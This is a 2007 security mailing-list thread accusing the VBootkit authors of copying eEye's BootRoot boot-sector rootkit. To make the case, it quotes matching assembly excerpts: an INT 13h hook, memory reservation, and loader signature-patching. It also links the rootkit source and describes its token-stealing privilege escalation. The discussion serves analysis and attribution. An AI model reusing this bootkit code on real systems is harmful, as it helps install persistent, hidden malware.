+0100 Subject: [Dailydave] Nitin Kumar & Vipin Kumar: "please remember to give necessary credit to the authors" PKB. Message-ID: <020901c78833$0a339210$2e08a8c0@CAM.ARTIMI.COM> Well, I see at Security Focus http://www.securityfocus.com/columnists/442/1 that some guys called Nitin and Vipin Kumar are claiming to have written a boot-sector rootkit called "VBootkit". There's a three page interview with them, and the source is available from their website: the links are Front door: http://www.nvlabs.in/. Article: "BOOT KIT: Custom boot sector based Windows 2000/XP/2003 Subversion" http://www.nvlabs.in/?q=node/11 Code download page: http://www.nvlabs.in/?q=node/14 Code URLs: http://www.nvlabs.in/files/bootkitbasic_0.zip http://www.nvlabs.in/files/bootkitprivilege_0.zip Now, sometimes I feel like I'm the only person on teh internets that can actually remember more than ten minutes ago in the past, but maybe it's only journalists. Still, the moment I saw the hyperbolic headline, "0wning Vista from the boot", I wondered what was so special about this that wasn't already demonstrated by Derek and Ryan from eEye two years ago. So, I downloaded their code. God, it sucks. I was very disappointed by the lack of any serious amount of comments; it's not easy to read. But, I could see easily they were using the same trick of hooking int 13h to stay resident that eEye demonstrated. Suddenly, this comment jumped out at me: ---------------------------------------------------------------- db 90h ; to get alignment, i suppose ---------------------------------------------------------------- Huh? They suppose? Don't they even know why they did it? Then I saw the line after next: ---------------------------------------------------------------- dword_E5: dd 0 ;something extra ---------------------------------------------------------------- That's not the kind of label someone writes in their code, and it's not the kind of comment that someone writes. That's an IDA auto-generated label. By now, I was getting seriously suspicious. So, for comparison, here's the start of the code from eEye's BootRoot: ---------------------------------------------------------------- cli xor bx, bx mov ss, bx mov ss:[BOOTORG - 2], sp mov sp, (BOOTORG - 2) push ds pushad mov ds, bx ; ; Reserve 1KB conventional memory for our memory-resident code ; dec word ptr ds:[0413h] ; 0040h:0013h - base memory size in KBs mov ax, ds:[0413h] shl ax, (10-4) ; AX *= 1024 / 16 (convert linear address in KBs to a segment) mov es, ax ; ; Copy ourselves to reserved memory and initialize the rest to zeroes ; cld mov si, BOOTORG xor di, di mov cx, BOOTROOT_SIZE / 2 rep movsw xor ax, ax mov ch, (1024 - BOOTROOT_SIZE) / 2 / 100h rep stosw ; ; Install our INT 13h hook ; mov eax, ds:[bx + (13h*4)] mov es:[INT13HANDLER - @BRCODE16_START], eax ; store previous handler mov word ptr [bx + (13h*4)], @Int13Hook ; point INT 13h vector to our hook handler mov [bx + (13h*4) + 2], es ; (BX = 0 from earlier) ; ; Load and execute MBR from first hard drive (do this from resident code) ; push es push @BootFromHDD retf ---------------------------------------------------------------- ... and here's the start of their code: ---------------------------------------------------------------- cli xor bx,bx mov ss,bx mov [ss:0x7bfe],sp mov sp,0x7bfe push ds pushad mov ds,bx mov ax,[0x413] sub ax,2 mov [0x413],ax shl ax,0x6 mov ax,CODEBASEIN1MB mov es,ax mov [0x7c00 + codereloc],ax cld mov si,0x7c00 xor di,di mov cx,0x400 ;number of bytes 2 copy to new location this is in words currently 2 kbs are loaded rep movsw sti mov ax,0x201 mov cl,0x2 cdq cli mov eax,[0x4c] mov [es:INT13INTERRUPTVALUE],eax mov word [0x4c], newint13handler mov [0x4e],es sti directjumpwithouthook: push es push word newmemorycodestart retf newmemorycodestart: ---------------------------------------------------------------- Apart from changing "dec word ptr ds:[0413h]" into a load-subtract-store sequence, because they wanted to reserve 2kB instead of one, and apart from changing the amount of memory copied to 2kB, and replacing the sequence xor ax, ax mov ch, (1024 - BOOTROOT_SIZE) / 2 / 100h rep stosw that pads to the top of memory with zeros by the meaningless (since eax is immediately overwritten anyway) sequence[*]: sti mov ax,0x201 mov cl,0x2 cdq cli it's identical. Or take a look at the signature of bytes they search for to overwrite in the int13 hook: eEye ---------------------------------------------------------------- @Int13Hook_scan_loop: ; 8B F0 MOV ESI, EAX ; 85 F6 TEST ESI, ESI ; 74 21 JZ $+23h ; 80 3D ... CMP BYTE PTR [ofs32], imm8 ; (the first 6 bytes of this signature exist in other modules!) repne scasb jne short @Int13Hook_scan_done cmp dword ptr es:[di], 74F685F0h jne short @Int13Hook_scan_loop cmp word ptr es:[di+4], 8021h jne short @Int13Hook_scan_loop mov word ptr es:[di-1], 15FFh ; FFh/15h/xx/xx/xx/xx: CALL NEAR [ofs32] ---------------------------------------------------------------- and now Vbootkit: ---------------------------------------------------------------- scanloop: repne scasb jnz scandone cmp dword [es:di],0x74f685f0 ;these are signature bytes jnz scanloop cmp word [es:di+0x4],0x8021 jnz scanloop mov word [es:di-0x1],0x15ff ---------------------------------------------------------------- I've seen enough. It's transparently obvious that these self-publicising clowns have used IDA to disassemble BootRoot (Guys! Didn't you know it comes with source? How dumb are you?), and have crudely hacked out the very very clever ndis-patching backdoor payload written by Derek and Ryan and replaced it with their own crappy amateurish functionality. Just to really put the icing on the cake, and then put the cherry on the icing, these code-stealing tossers placed the following pitiable request at the top of their assembler source: ---------------------------------------------------------------- ;If you develop anything using this code, please remember to give necessary credit to the authors ---------------------------------------------------------------- Nitin? Vipin? I agree; we all should remember to give necessary credit to the authors: Derek Soeder and Ryan Permeh, whose innovative hard work deserves praise. How come you guys forgot to, huh? cheers, DaveK [*] Footnote: I haven't looked at the opcodes for these two sequences, but what's the betting they're mostly the same bytes, and these guys have somehow managed to get a framing error when IDAing it? -- Can't think of a witty .sigline today.... From dave.korn at artimi.com Thu Apr 26 17:22:33 2007 From: dave.korn at artimi.com (Dave Korn) Date: Thu, 26 Apr 2007 22:22:33 +0100 Subject: [Dailydave] Nitin Kumar & Vipin Kumar: "please remember to give necessary credit to the authors" PKB. In-Reply-To: <200704262208.40143.ed@bsd.it> References: <020901c78833$0a339210$2e08a8c0@CAM.ARTIMI.COM> <200704262208.40143.ed@bsd.it> Message-ID: <023c01c78849$01415f00$2e08a8c0@CAM.ARTIMI.COM> On 26 April 2007 21:09, Ed wrote: > On Thursday 26 April 2007 20:45, Dave Korn wrote: >> Code download page: http://www.nvlabs.in/?q=node/14 > > The source code you have analized is not what we are talking about in the > interview. Ah, I must admit to not having realized that. However, I will point out that what they describe in their paper and presentation is the exact same method: hook int 13h at startup, patch each stage as it loads. The advanced (privilege escalation) version on that page does the raise-cmd.exe-every-30-seconds trick in the exact same way. I'd also like to point out that their code is buggy. They copy the token pointer from one _EPROCESS to another. They don't call ObReferenceObjectByPointer. Guess what? As soon as you exit that cmd.exe, it will dereference the token once. That's the system process' token, that is. Open another cmd.exe, wait 30 seconds for it to be elevated, close it again - the system process loses one more reference count on its token. Do it enough times, the reference count will fall to zero, the object manager will deallocate the system process' token, but the pointer will still be there in the system process' _EPROCESS block. I reckon you'd probably BSoD within milliseconds, but maybe it might last for a while - until the page gets swapped out or deallocated, or something overwrites it... I will concede that they've done at least some genuine work in reversing the integrity checks in the loader, but that's fairly routine stuff; bypassing a check by altering the test in a branch instruction is pretty trivial, it's about on the level of finding an infinite lives poke in a computer game. > They have not shared the code for Vista version, but as far as I > know none of the attendees of their recent talks at BlackHat and HITB found > anything "already seen". > > http://www.blackhat.com/html/bh-europe-07/bh-eu-07-speakers.html#Kumar > http://conference.hitb.org/hitbsecconf2007dubai/?page_id=116 That is pretty remarkable. I would have expected somebody to say something during the q'n'a session that most talks have at the end, if only to ask them "In what way does your technique *differ* from BootRoot?" Were you there yourself? Is there any online video or audio of their session? It's not like we would necessarily have heard if one of the attendees did find they'd already seen it. > P.S. This is not a tactic to force them to make their source code public, > right? Well, no, it's no tactic; I really thought that was the source they're referring to, and since the source they /are/ referring to does exactly the same things by using exactly the same techniques, I think it's reasonable to infer that they've probably got most of the same code in the vista version. My only intention was to call them out on their plagiarism. They crudely hacked about and ported eEye's code and didn't credit them. They've plugged in new payloads, but swapping one shellcode for another isn't news. The fact that the code that they /have/ chosen to release demonstrates a very poor understanding of kernel coding, and the fact that there's stuff in their code that they don't know why it's there or what it's for, makes me doubt they have anything extraordinary that they aren't showing us. cheers, DaveK -- Can't think of a witty .sigline today.... From cisoguy at gmail.com Thu Apr 26 17:26:20 2007 From: cisoguy at gmail.com (Jeff Moore) Date: Thu, 26 Apr 2007 14:26:20 -0700 Subject: [Dailydave] Nitin Kumar & Vipin Kumar: "please remember to give necessary credit to the authors" PKB. In-Reply-To: <020901c78833$0a339210$2e08a8c0@CAM.ARTIMI.COM> References: <020901c78833$0a339210$2e08a8c0@CAM.ARTIMI.COM> Message-ID: <97775f7a0704261426g3b8562cbgc2f48348fdd78a56@mail.gm